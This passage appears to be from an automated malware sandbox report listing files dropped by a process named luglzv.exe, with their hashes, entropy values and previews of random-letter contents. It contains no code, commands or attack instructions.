                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):402
                                                                  Entropy (8bit):3.493087299556618
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694982189683734
                                                                  Encrypted:false
                                                                  SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                  MD5:E49F84B05A175C231342E6B705A24A44
                                                                  SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                  SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                  SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.688284131239007
                                                                  Encrypted:false
                                                                  SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                  MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                  SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                  SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                  SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                  Malicious:false
                                                                  Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
